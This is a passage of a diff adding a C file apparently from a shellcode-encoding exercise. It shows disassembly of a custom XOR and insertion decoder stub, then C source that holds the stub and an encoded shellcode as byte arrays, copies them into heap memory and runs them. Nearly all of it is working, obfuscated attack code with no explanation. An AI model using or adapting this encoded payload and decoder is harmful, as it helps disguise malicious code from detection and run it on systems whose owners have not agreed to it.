+ 8048065:	8a 07                	mov    al,BYTE PTR [edi]
+ 8048067:	6a 90                	push   0xffffff90
+ 8048069:	5b                   	pop    ebx
+ 804806a:	3c aa                	cmp    al,0xaa
+ 804806c:	74 0a                	je     8048078 <decode_insertion>
+ 804806e:	30 d8                	xor    al,bl
+
+08048070 <decode_xor>:
+ 8048070:	30 07                	xor    BYTE PTR [edi],al
+ 8048072:	47                   	inc    edi
+ 8048073:	30 07                	xor    BYTE PTR [edi],al
+ 8048075:	47                   	inc    edi
+ 8048076:	eb ed                	jmp    8048065 <get_key>
+
+08048078 <decode_insertion>:
+ 8048078:	8d 3e                	lea    edi,[esi]
+ 804807a:	31 c0                	xor    eax,eax
+ 804807c:	31 db                	xor    ebx,ebx
+
+0804807e <insertion_decoder>:
+ 804807e:	8a 1c 06             	mov    bl,BYTE PTR [esi+eax*1]
+ 8048081:	80 f3 90             	xor    bl,0x90
+ 8048084:	75 10                	jne    8048096 <encoded>
+ 8048086:	8a 5c 06 01          	mov    bl,BYTE PTR [esi+eax*1+0x1]
+ 804808a:	88 1f                	mov    BYTE PTR [edi],bl
+ 804808c:	47                   	inc    edi
+ 804808d:	04 02                	add    al,0x2
+ 804808f:	eb ed                	jmp    804807e <insertion_decoder>
+
+08048091 <find_address>:
+ 8048091:	e8 cc ff ff ff       	call   8048062 <decoder>
+
+08048096 <encoded>:
+ 8048096:	b7 cc                	mov    bh,0xcc
+ 8048098:	3d ba 0a ab f3       	cmp    eax,0xf3ab0aba
+ 804809d:	a3 9b bb 01 95       	mov    ds:0x9501bb9b,eax
+ 80480a2:	75 d4                	jne    8048078 <decode_insertion>
+ 80480a4:	bc f7 fa d9 1c       	mov    esp,0x1cd9faf7
+ 80480a9:	8d                   	(bad)  
+ 80480aa:	d5 1c                	aad    0x1c
+ 80480ac:	f7 56 73             	not    DWORD PTR [esi+0x73]
+ 80480af:	31 ef                	xor    edi,ebp
+ 80480b1:	cd a9                	int    0xa9
+ 80480b3:	34 12                	xor    al,0x12
+ 80480b5:	4f                   	dec    edi
+ 80480b6:	50                   	push   eax
+ 80480b7:	40                   	inc    eax
+ 80480b8:	71 d0                	jno    804808a <insertion_decoder+0xc>
+ 80480ba:	94                   	xchg   esp,eax
+ 80480bb:	c4                   	(bad)  
+ 80480bc:	f7 d7                	not    edi
+ 80480be:	7f ee                	jg     80480ae <encoded+0x18>
+ 80480c0:	62                   	(bad)  
+ 80480c1:	c3                   	ret    
+ 80480c2:	48                   	dec    eax
+ 80480c3:	03 d3                	add    edx,ebx
+ 80480c5:	8e 76 66             	mov    ?,WORD PTR [esi+0x66]
+ 80480c8:	2c 54                	sub    al,0x54
+ 80480ca:	0c 78                	or     al,0x78
+ 80480cc:	05 6a 37 58 e4       	add    eax,0xe458376a
+ 80480d1:	8b dc                	mov    ebx,esp
+ 80480d3:	04 3b                	add    al,0x3b
+ 80480d5:	ce                   	into   
+ 80480d6:	b6 4a                	mov    dh,0x4a
+ 80480d8:	af                   	scas   eax,DWORD PTR es:[edi]
+ 80480d9:	53                   	push   ebx
+ 80480da:	59                   	pop    ecx
+ 80480db:	a6                   	cmps   BYTE PTR ds:[esi],BYTE PTR es:[edi]
+ 80480dc:	b5 05                	mov    ch,0x5
+ 80480de:	f7 30                	div    DWORD PTR [eax]
+ 80480e0:	15 ea eb 09 9c       	adc    eax,0x9c09ebea
+ 80480e5:	60                   	pusha  
+ 80480e6:	e4 10                	in     al,0x10
+ 80480e8:	7d cc                	jge    80480b6 <encoded+0x20>
+ 80480ea:	56                   	push   esi
+ 80480eb:	cc                   	int3   
+ 80480ec:	aa                   	stos   BYTE PTR es:[edi],al
+****************************************************/
+
+#include<stdlib.h>
+#include<stdio.h>
+#include<string.h>
+
+unsigned char stub[] = \
+"\xeb\x31\x5f\x57\x5e\x8a\x07\x6a\x90\x5b\x3c\xaa\x74\x0a\x30\xd8\x30\x07\x47\x30\x07\x47\xeb\xed\x8d\x3e\x31\xc0\x31\xdb\x8a\x1c\x06\x80\xf3\x90\x75\x12\x8a\x5c\x06\x01\x88\x1f\x47\x04\x02\xeb\xed\xff\xe6\xe8\xca\xff\xff\xff";
+
+unsigned char shellcode[] = \
+"\xb7\xcc\x3d\xba\x0a\xab\xf3\xa3\x9b\xbb\x01\x95\x75\xd4\xbc\xf7\xfa\xd9\x1c\x8d\xd5\x1c\xf7\x56\x73\x31\xef\xcd\xa9\x34\x12\x4f\x50\x40\x71\xd0\x94\xc4\xf7\xd7\x7f\xee\x62\xc3\x48\x03\xd3\x8e\x76\x66\x2c\x54\x0c\x78\x05\x6a\x37\x58\xe4\x8b\xdc\x04\x3b\xce\xb6\x4a\xaf\x53\x59\xa6\xb5\x05\xf7\x30\x15\xea\xeb\x09\x9c\x60\xe4\x10\x7d\xcc\x56\xcc\xaa";
+
+unsigned char* code;
+
+main()
+{
+    printf("\nStub Length: %d\n", strlen(stub));
+    printf("Shellcode Length: %d\n\n", strlen(shellcode));
+
+    printf("Total Length: %d\n\n", strlen(stub) + strlen(shellcode));
+
+    code = malloc(strlen(stub) + strlen(shellcode));
+    memcpy(code, stub, strlen(stub));
+    memcpy(&code[strlen(stub)], shellcode, strlen(shellcode));
+
+    int (*ret)() = (int(*)())code;
+
+    ret();
+}
\ No newline at end of file